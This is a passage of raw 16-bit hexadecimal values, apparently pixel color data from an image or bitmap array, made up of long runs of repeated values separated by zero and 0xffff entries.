0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0x0000, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0x0000, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 